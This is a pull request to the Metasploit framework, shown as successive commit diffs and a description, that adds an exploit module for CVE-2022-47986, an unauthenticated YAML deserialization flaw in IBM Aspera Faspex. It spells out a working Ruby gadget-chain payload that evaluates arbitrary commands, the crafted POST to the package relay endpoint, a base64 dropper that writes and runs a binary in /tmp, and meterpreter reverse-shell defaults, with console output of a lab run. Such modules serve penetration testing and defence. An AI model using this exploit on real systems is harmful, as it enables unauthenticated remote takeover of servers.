### PR TITLE
[exploit][RCE][CVE-2022-47986] IBM aspera faspex YAML deserialization

### DIFF
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -64,61 +64,61 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     )
+    register_options(
+      [OptString.new('TARGETURI', [ false, 'The base path for the IBM Aspera Faspex Application.', '/aspera/faspex'])]
+    )
   end
 
-
   def execute_command(command, _opts = {})
-    exploit = %Q(
----
-- !ruby/object:Gem::Installer
-    i: x
-- !ruby/object:Gem::SpecFetcher
-    i: y
-- !ruby/object:Gem::Requirement
-  requirements:
-    !ruby/object:Gem::Package::TarReader
-    io: &1 !ruby/object:Net::BufferedIO
-      io: &1 !ruby/object:Gem::Package::TarReader::Entry
-         read: 0
-         header: "pew"
-      debug_output: &1 !ruby/object:Net::WriteAdapter
-         socket: &1 !ruby/object:PrettyPrint
-             output: !ruby/object:Net::WriteAdapter
-                 socket: &1 !ruby/module "Kernel"
-                 method_id: :eval
-             newline: "throw `#{command}`"
-             buffer: {}
-             group_stack:
-              - !ruby/object:PrettyPrint::Group
-                break: true
-         method_id: :breakable
-      ).gsub(/\n/, '\n').gsub(/"/, '\"')
+    exploit = <<~EOT
+      ---
+      - !ruby/object:Gem::Installer
+          i: x
+      - !ruby/object:Gem::SpecFetcher
+          i: y
+      - !ruby/object:Gem::Requirement
+        requirements:
+          !ruby/object:Gem::Package::TarReader
+          io: &1 !ruby/object:Net::BufferedIO
+            io: &1 !ruby/object:Gem::Package::TarReader::Entry
+               read: 0
+               header: "pew"
+            debug_output: &1 !ruby/object:Net::WriteAdapter
+               socket: &1 !ruby/object:PrettyPrint
+                   output: !ruby/object:Net::WriteAdapter
+                       socket: &1 !ruby/module "Kernel"
+                       method_id: :eval
+                   newline: "throw `#{command}`"
+                   buffer: {}
+                   group_stack:
+                    - !ruby/object:PrettyPrint::Group
+                      break: true
+               method_id: :breakable
+    EOT
+    uuid = SecureRandom.uuid
 
-      uuid = SecureRandom.uuid
-      payload = %Q({
-  "package_file_list": [
-    "/"
-  ],
-  "external_emails": "#{exploit}",
-  "package_name": "assetnote_pack",
-  "package_note": "#{Rex::Text.rand_text(50, bad: '', chars: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15)}",
-  "original_sender_name": "#{Rex::Text.rand_name()}",
-  "package_uuid": "#{uuid}",
-  "metadata_human_readable": "Yes",
-  "forward": "pew",
-  "metadata_json": "{}",
-  "delivery_uuid": "#{uuid}",
-  "delivery_sender_name": "#{Rex::Text.rand_name()}",
-  "delivery_title": "#{Rex::Text.rand_text_alphanumeric(4)}",
-  "delivery_note": "#{Rex::Text.rand_text_alphanumeric(12)}",
-  "delete_after_download": true,
-  "delete_after_download_condition": "IDK"
-})
+    payload = {
+      "package_file_list[]": '/',
+      external_emails: exploit,
+      package_name: 'assetnote_pack',
+      package_note: Rex::Text.rand_text(50, bad: '', chars: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15).to_s,
+      original_sender_name: Rex::Text.rand_name.to_s,
+      package_uuid: uuid.to_s,
+      metadata_human_readable: 'Yes',
+      forward: 'pew',
+      metadata_json: '{}',
+      delivery_uuid: uuid.to_s,
+      delivery_sender_name: Rex::Text.rand_name.to_s,
+      delivery_title: Rex::Text.rand_text_alphanumeric(4).to_s,
+      delivery_note: Rex::Text.rand_text_alphanumeric(12).to_s,
+      delete_after_download: true,
+      delete_after_download_condition: 'IDK'
+    }
 
     response = send_request_raw({
       'method' => 'POST',
-      'uri' => normalize_uri(datastore['TARGETURI'], '/aspera/faspex/package_relay/relay_package'),
-      'data' => payload
+      'uri' => normalize_uri(datastore['TARGETURI'], '/package_relay/relay_package'),
+      'data' => URI.encode_www_form(payload)
     })
     if response && response.body
       return response.body

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -17,8 +17,8 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'IBM Aspera Faspex YAML deserialization vulnerability',
         'Description' => %q{
-          This module exploit an unauthenticated RCE vulnerability
-          which exists in IBM Aspera Faspex version 4.4.1 (CVE-2022-47986).
+          This module exploits an unauthenticated YAML deserialization vulnerability
+          which exists in IBM Aspera Faspex version 4.4.2 Patch Level 1 and below (CVE-2022-47986).
         },
         'References' => [
           ['CVE', '2022-47986'],

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -66,9 +66,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def cmd_unix_generic?
-    datastore['PAYLOAD'] == 'cmd/unix/generic'
-  end
 
   def execute_command(command, _opts = {})
     exploit = %q#

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'ohnonoyesyes',    # POC
           'Maurice LAMBERT', # Metasploit auxiliary module
         ],
-        'DisclosureDate' => '',
+        'DisclosureDate' => '2023-02-02',
         'License' => MSF_LICENSE,
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
               - !ruby/object:PrettyPrint::Group
                 break: true
          method_id: :breakable
-      #.gsub(/command/, command).gsub(/\n/, "\\n").gsub(/"/, "\\\"")
+      #.gsub(/command/, command).gsub(/\n/, '\n').gsub(/"/, '\"')
 
       payload = %q#{
   "package_file_list": [
@@ -118,9 +118,9 @@ class MetasploitModule < Msf::Exploit::Remote
 }#.gsub(/exploit/, exploit)
 
     response = send_request_raw({
-      'method' => "POST",
+      'method' => 'POST',
       'uri' => normalize_uri(datastore['TARGETURI'], '/aspera/faspex/package_relay/relay_package'),
-      'data' => payload,
+      'data' => payload
     })
     if response && response.body
       return response.body

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -129,6 +129,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     print_status('Exploiting...')
-    execute_cmdstager
+    execute_command(payload.encoded)
   end
 end

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -133,8 +133,8 @@ class MetasploitModule < Msf::Exploit::Remote
     file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}"
     cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}"
 
-    print_status(message("Sending #{datastore['PAYLOAD']} command payload"))
-    vprint_status(message("Generated command payload: #{cmd}"))
+    print_status("Sending #{datastore['PAYLOAD']} command payload")
+    vprint_status("Generated command payload: #{cmd}")
 
     execute_command(cmd)
 

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
   "forward": "pew",
   "metadata_json": "{}",
   "delivery_uuid": uuid,
-  "delivery_sender_name": "assetnote",
+  "delivery_sender_name": Rex::Text.rand_name(),
   "delivery_title": Rex::Text.rand_text_alphanumeric(4),
   "delivery_note": Rex::Text.rand_text_alphanumeric(12),
   "delete_after_download": true,

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -37,8 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
         'DefaultOptions' => {
-          'CheckModule' => '',
-          'Action' => 'CHECK_RCE',
           'RPORT' => 443,
           'SSL' => true
         },

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -94,22 +94,23 @@ class MetasploitModule < Msf::Exploit::Remote
          method_id: :breakable
       #.gsub(/command/, command).gsub(/\n/, '\n').gsub(/"/, '\"')
 
+      uuid = SecureRandom.uuid
       payload = %q#{
   "package_file_list": [
     "/"
   ],
   "external_emails": "exploit",
   "package_name": "assetnote_pack",
-  "package_note": "hello from assetnote team",
-  "original_sender_name": "assetnote",
-  "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
+  "package_note": ,
+  "original_sender_name": Rex::Text.rand_name(),
+  "package_uuid": uuid,
   "metadata_human_readable": "Yes",
   "forward": "pew",
   "metadata_json": "{}",
-  "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
+  "delivery_uuid": uuid,
   "delivery_sender_name": "assetnote",
-  "delivery_title": "TEST",
-  "delivery_note": "TEST",
+  "delivery_title": Rex::Text.rand_text_alphanumeric(4),
+  "delivery_note": Rex::Text.rand_text_alphanumeric(12),
   "delete_after_download": true,
   "delete_after_download_condition": "IDK"
 }#.gsub(/exploit/, exploit)

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -1,0 +1,143 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::CheckModule
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'IBM Aspera Faspex YAML deserialization vulnerability',
+        'Description' => %q{
+          This module exploit an unauthenticated RCE vulnerability
+          which exists in IBM Aspera Faspex version 4.4.1 (CVE-2022-47986).
+        },
+        'References' => [
+          ['CVE', '2022-47986'],
+          ['URL', 'https://www.ibm.com/support/pages/node/6952319'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-47986'],
+          ['URL', 'https://github.com/ohnonoyesyes/CVE-2022-47986/blob/main/poc.py'],
+          ['URL', 'https://thehackernews.com/2023/03/icefire-linux-ransomware.html'],
+          ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis?source=mastodon'],
+        ],
+        'Author' => [
+          'ohnonoyesyes'     # POC
+          'Maurice LAMBERT', # Metasploit auxiliary module
+        ],
+        'DisclosureDate' => '',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
+        'DefaultOptions' => {
+          'CheckModule' => '',
+          'Action' => 'CHECK_RCE',
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Targets' => [
+          [
+            'Automatic (Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+                'DisablePayloadHandler' => 'false'
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def cmd_unix_generic?
+    datastore['PAYLOAD'] == 'cmd/unix/generic'
+  end
+
+  def execute_command(command, _opts = {})
+    exploit = %q#
+---
+- !ruby/object:Gem::Installer
+    i: x
+- !ruby/object:Gem::SpecFetcher
+    i: y
+- !ruby/object:Gem::Requirement
+  requirements:
+    !ruby/object:Gem::Package::TarReader
+    io: &1 !ruby/object:Net::BufferedIO
+      io: &1 !ruby/object:Gem::Package::TarReader::Entry
+         read: 0
+         header: "pew"
+      debug_output: &1 !ruby/object:Net::WriteAdapter
+         socket: &1 !ruby/object:PrettyPrint
+             output: !ruby/object:Net::WriteAdapter
+                 socket: &1 !ruby/module "Kernel"
+                 method_id: :eval
+             newline: "throw `command`"
+             buffer: {}
+             group_stack:
+              - !ruby/object:PrettyPrint::Group
+                break: true
+         method_id: :breakable
+      #.gsub(/command/, command).gsub(/\n/, "\\n").gsub(/"/, "\\\"")
+
+      payload = %q#{
+  "package_file_list": [
+    "/"
+  ],
+  "external_emails": exploit,
+  "package_name": "assetnote_pack",
+  "package_note": "hello from assetnote team",
+  "original_sender_name": "assetnote",
+  "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
+  "metadata_human_readable": "Yes",
+  "forward": "pew",
+  "metadata_json": '{}',
+  "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
+  "delivery_sender_name": "assetnote",
+  "delivery_title": "TEST",
+  "delivery_note": "TEST",
+  "delete_after_download": True,
+  "delete_after_download_condition": "IDK",
+}#.gsub(/exploit/, exploit)
+
+    response = send_request_raw({
+      'method' => "POST",
+      'uri' => normalize_uri(datastore['TARGETURI'], '/aspera/faspex/package_relay/relay_package'),
+      'data' => payload,
+    })
+    if response && response.body
+      return response.body
+    end
+
+    false
+  end
+
+  def exploit
+    file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}"
+    cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}"
+
+    print_status(message("Sending #{datastore['PAYLOAD']} command payload"))
+    vprint_status(message("Generated command payload: #{cmd}"))
+
+    execute_command(cmd)
+
+    register_file_for_cleanup file_name
+  end
+end

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis?source=mastodon'],
         ],
         'Author' => [
-          'ohnonoyesyes'     # POC
+          'ohnonoyesyes',    # POC
           'Maurice LAMBERT', # Metasploit auxiliary module
         ],
         'DisclosureDate' => '',

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
   "package_file_list": [
     "/"
   ],
-  "external_emails": exploit,
+  "external_emails": "exploit",
   "package_name": "assetnote_pack",
   "package_note": "hello from assetnote team",
   "original_sender_name": "assetnote",

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
-  include Msf::Exploit::Remote::CheckModule
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
 

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def execute_command(command, _opts = {})
-    exploit = %q#
+    exploit = %Q(
 ---
 - !ruby/object:Gem::Installer
     i: x
@@ -84,34 +84,34 @@ class MetasploitModule < Msf::Exploit::Remote
              output: !ruby/object:Net::WriteAdapter
                  socket: &1 !ruby/module "Kernel"
                  method_id: :eval
-             newline: "throw `command`"
+             newline: "throw `#{command}`"
              buffer: {}
              group_stack:
               - !ruby/object:PrettyPrint::Group
                 break: true
          method_id: :breakable
-      #.gsub(/command/, command).gsub(/\n/, '\n').gsub(/"/, '\"')
+      ).gsub(/\n/, '\n').gsub(/"/, '\"')
 
       uuid = SecureRandom.uuid
-      payload = %q#{
+      payload = %Q({
   "package_file_list": [
     "/"
   ],
-  "external_emails": "exploit",
+  "external_emails": "#{exploit}",
   "package_name": "assetnote_pack",
-  "package_note": Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15),
-  "original_sender_name": Rex::Text.rand_name(),
-  "package_uuid": random_uuid,
+  "package_note": "#{Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15)}",
+  "original_sender_name": "#{Rex::Text.rand_name()}",
+  "package_uuid": "#{uuid}",
   "metadata_human_readable": "Yes",
   "forward": "pew",
   "metadata_json": "{}",
-  "delivery_uuid": random_uuid,
-  "delivery_sender_name": Rex::Text.rand_name(),
-  "delivery_title": Rex::Text.rand_text_alphanumeric(4),
-  "delivery_note": Rex::Text.rand_text_alphanumeric(12),
+  "delivery_uuid": "#{uuid}",
+  "delivery_sender_name": "#{Rex::Text.rand_name()}",
+  "delivery_title": "#{Rex::Text.rand_text_alphanumeric(4)}",
+  "delivery_note": "#{Rex::Text.rand_text_alphanumeric(12)}",
   "delete_after_download": true,
   "delete_after_download_condition": "IDK"
-}#.gsub(/exploit/, exploit).gsub(/random_uuid/, uuid)
+})
 
     response = send_request_raw({
       'method' => 'POST',

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
   ],
   "external_emails": "exploit",
   "package_name": "assetnote_pack",
-  "package_note": ,
+  "package_note": Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15),
   "original_sender_name": Rex::Text.rand_name(),
   "package_uuid": uuid,
   "metadata_human_readable": "Yes",

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -108,13 +108,13 @@ class MetasploitModule < Msf::Exploit::Remote
   "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
   "metadata_human_readable": "Yes",
   "forward": "pew",
-  "metadata_json": '{}',
+  "metadata_json": "{}",
   "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
   "delivery_sender_name": "assetnote",
   "delivery_title": "TEST",
   "delivery_note": "TEST",
   "delete_after_download": True,
-  "delete_after_download_condition": "IDK",
+  "delete_after_download_condition": "IDK"
 }#.gsub(/exploit/, exploit)
 
     response = send_request_raw({

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
   ],
   "external_emails": "#{exploit}",
   "package_name": "assetnote_pack",
-  "package_note": "#{Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15)}",
+  "package_note": "#{Rex::Text.rand_text(50, bad: '', chars: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15)}",
   "original_sender_name": "#{Rex::Text.rand_name()}",
   "package_uuid": "#{uuid}",
   "metadata_human_readable": "Yes",

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-47986'],
           ['URL', 'https://github.com/ohnonoyesyes/CVE-2022-47986/blob/main/poc.py'],
           ['URL', 'https://thehackernews.com/2023/03/icefire-linux-ransomware.html'],
-          ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis?source=mastodon'],
+          ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis'],
         ],
         'Author' => [
           'ohnonoyesyes',    # POC

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
   "delivery_note": Rex::Text.rand_text_alphanumeric(12),
   "delete_after_download": true,
   "delete_after_download_condition": "IDK"
-}#.gsub(/exploit/, exploit)
+}#.gsub(/exploit/, exploit).gsub(/uuid/, uuid)
 
     response = send_request_raw({
       'method' => 'POST',

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::CheckModule
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -42,18 +43,20 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Targets' => [
           [
-            'Automatic (Dropper)',
+            'Unix Command',
             {
-              'Platform' => 'linux',
-              'Arch' => [ARCH_X64, ARCH_X86],
-              'Type' => :linux_dropper,
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
-                'DisablePayloadHandler' => 'false'
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',
+                'RPORT' => 9000
               }
             }
           ],
         ],
+        'CmdStagerFlavor' => [ 'echo' ],
+        'Payload' => { 'BadChars' => '`' },
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -126,13 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}"
-    cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}"
-
-    print_status("Sending #{datastore['PAYLOAD']} command payload")
-    vprint_status("Generated command payload: #{cmd}")
-
-    execute_command(cmd)
-
+    print_status('Exploiting...')
+    execute_cmdstager
   end
 end

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -101,17 +101,17 @@ class MetasploitModule < Msf::Exploit::Remote
   "package_name": "assetnote_pack",
   "package_note": Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15),
   "original_sender_name": Rex::Text.rand_name(),
-  "package_uuid": uuid,
+  "package_uuid": random_uuid,
   "metadata_human_readable": "Yes",
   "forward": "pew",
   "metadata_json": "{}",
-  "delivery_uuid": uuid,
+  "delivery_uuid": random_uuid,
   "delivery_sender_name": Rex::Text.rand_name(),
   "delivery_title": Rex::Text.rand_text_alphanumeric(4),
   "delivery_note": Rex::Text.rand_text_alphanumeric(12),
   "delete_after_download": true,
   "delete_after_download_condition": "IDK"
-}#.gsub(/exploit/, exploit).gsub(/uuid/, uuid)
+}#.gsub(/exploit/, exploit).gsub(/random_uuid/, uuid)
 
     response = send_request_raw({
       'method' => 'POST',

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -134,6 +134,5 @@ class MetasploitModule < Msf::Exploit::Remote
 
     execute_command(cmd)
 
-    register_file_for_cleanup file_name
   end
 end

--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
   "delivery_sender_name": "assetnote",
   "delivery_title": "TEST",
   "delivery_note": "TEST",
-  "delete_after_download": True,
+  "delete_after_download": true,
   "delete_after_download_condition": "IDK"
 }#.gsub(/exploit/, exploit)
 


### PR DESCRIPTION
Fixes #17759 

 - Adds a module for exploiting CVE-2022-47986 a YAML deserialization that causes an RCE in IBM Aspera Faspex 

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization`
- [x] `set RHOST <ip>`
- [x] `set LHOST <ip>`
- [x] `exploit`

## Output

```text
msf6 > use exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 172.17.0.2
RHOST => 172.17.0.2
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit
[*] Exploiting target 172.17.0.2

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Sending linux/x64/meterpreter/reverse_tcp command payload
[!] This exploit may require manual cleanup of '/tmp/VmehKS' on the target
```